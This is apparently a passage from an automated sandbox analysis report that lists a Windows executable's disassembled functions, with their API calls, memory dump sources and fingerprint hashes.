                                                                          • Opcode Fuzzy Hash: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                          • Instruction Fuzzy Hash: 21E026617843112AF23514567C83B7F1A4E83C0B04FE4842B7B00DE3C3DAAEAD09429E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,004235EC,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 00406329
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DC1C Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                          • Instruction ID: 5aa87c08ff8936fcaaa84cf50ff31e6a06e3de0a8084b04fc6442f63f77fe161
                                                                          • Opcode Fuzzy Hash: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                          • Instruction Fuzzy Hash: BDE07EB2600129AF9B40DE8DDC81EEB37ADAB1D350F404016FA08D7200C2B4EC519BB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453438 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindClose.KERNEL32(00000000,000000FF,0046C394,00000000,0046D18D,?,00000000,0046D1D6,?,00000000,0046D30F,?,00000000,?,00000000), ref: 0045344E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFind
                                                                          • String ID:
                                                                          • API String ID: 1863332320-0
                                                                          • Opcode ID: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                          • Instruction ID: f2f8a632f0a2160e68271c263a111a4b86933883cadac8f3c7310e18fb689ea2
                                                                          • Opcode Fuzzy Hash: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                          • Instruction Fuzzy Hash: A3E065B05046008BDB15DF3A848025676D15F89321F14C56AAC58CB3A6D63C840A8A56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004145EC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(0048F91E,?,0048F940,?,?,00000000,0048F91E,?,?), ref: 0041460B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406E78 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406E8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
                                                                          • Instruction ID: 5e9ef0cb41ef517b54198f539e7e4457f1ce254f1207c5e451c0fee893fabf4d
                                                                          • Opcode Fuzzy Hash: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
                                                                          • Instruction Fuzzy Hash: 3DD05B763082107AD620A55BAC44DA76BDCCFC5770F11063EB558C71C1D6309C01C675
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004235BC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00423568: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042357D
                                                                          • ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                            • Part of subcall function 00423598: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3202724764-0
                                                                          • Opcode ID: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
                                                                          • Instruction ID: 6e8deb3ed7ffb4c54c7bf11bddd21d475954711d807402a63cfbe74293682e9f
                                                                          • Opcode Fuzzy Hash: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
                                                                          • Instruction Fuzzy Hash: 03D05E123812743102107ABB280998B42A84D862AB388043BB54CDB202E91E8A81A1AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00424234 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID:
                                                                          • API String ID: 530164218-0
                                                                          • Opcode ID: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                          • Instruction ID: a3b20f4c882213fa23ff33249cd178fa67041ba6f44abe22b1f00704e939aabb
                                                                          • Opcode Fuzzy Hash: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                          • Instruction Fuzzy Hash: 4CD05EE27011702BCB01BBED54C4AC667CC8B8829AB1940BBF918EF257C638CE448398
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042CC00 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00450A53,00000000), ref: 0042CC0B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                          • Instruction ID: 3d474633da5dc292dd1e9b08acfa0ea7ef8e6560f0837aa6ac70ccb6d2902417
                                                                          • Opcode Fuzzy Hash: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                          • Instruction Fuzzy Hash: 42C08CE03022001A9A1465BF2CC511F42C8891827A3A41F37F53CE32D2D27E88A72428
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00462FEC Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406E28 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                          • Opcode Fuzzy Hash: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407210 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                          • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                          • Opcode Fuzzy Hash: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                          • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044FE04 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                            • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
                                                                          • Instruction ID: c068c6aabe38557252dbc7cfbc7370f277f9ebc01c0ea26a9f887d834500d39f
                                                                          • Opcode Fuzzy Hash: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
                                                                          • Instruction Fuzzy Hash: 2CC04CA130050047DF11A6AED5C190763D89E4D2163544176B504CF217D668D8184A14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E24B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                          • Instruction ID: b0804e078831a813d9aa2463563e291fc03c9a68ee142e2bda9a21ea894dad8b
                                                                          • Opcode Fuzzy Hash: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                          • Instruction Fuzzy Hash: AFB09B7670C600DDB709D6D6745552D63D8D7C47207E145B7F001D2580D93C58004928
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041655C Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                          • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                          • Opcode Fuzzy Hash: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                          • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00447FBC Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
                                                                          • Instruction ID: 3d9dac49d769706550815f3fb3cd696203b03cba94e1f0501d82b18e9078b8ff
                                                                          • Opcode Fuzzy Hash: 1f2ac44561df58c1130f0e00043173dc2e2ecdcc2ac39e257b7ae57b123e96e8
                                                                          • Instruction Fuzzy Hash: 7A517770E041499FEB00EFA9C882AAEBBF5EB45314F51416BE504A7351DB389D46CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045BF90 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C020
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                          • Instruction ID: 7372c421533d8f65bf23ff6fb62ce760878112a7f7dadb819c72ada28c104ff7
                                                                          • Opcode Fuzzy Hash: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                          • Instruction Fuzzy Hash: 4C1133716002049BDB10EE59C8C2B5B7794EF8475AF05446AFD589B2C7DB38E809CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041F334 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                          • Instruction ID: e05957f4d255e36abe150b4c83bb7920b28d063535c27f5b5ffcdbb78f87973e
                                                                          • Opcode Fuzzy Hash: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                          • Instruction Fuzzy Hash: 13114C742407059BC710DF59D880B86FBE5EB99350B10C53BE9688B385D378E946CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001B1C,00005B1F,00401973), ref: 00401766
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 73967e57ec88561925e751cf3b04359846007a52136d561720e1a1017b553e6f
                                                                          • Instruction ID: d642a266e39ce0e7ed3a16981b1f18689788e3c7e0ce9d7f944c9fabc33182c4
                                                                          • Opcode Fuzzy Hash: 73967e57ec88561925e751cf3b04359846007a52136d561720e1a1017b553e6f
                                                                          • Instruction Fuzzy Hash: E90120766443148FC3109F29DCC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00451948 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,004519B1), ref: 00451993
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                          • Instruction ID: 105945ddca3cabd7714cdb0ae074d91085a40d6b67da20b4593713f233405893
                                                                          • Opcode Fuzzy Hash: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                          • Instruction Fuzzy Hash: 740170756082486F8B00DF699C509EEFBE8EB4D72071083B7FC54D3791D6344D05D668
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045BF38 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          APIs
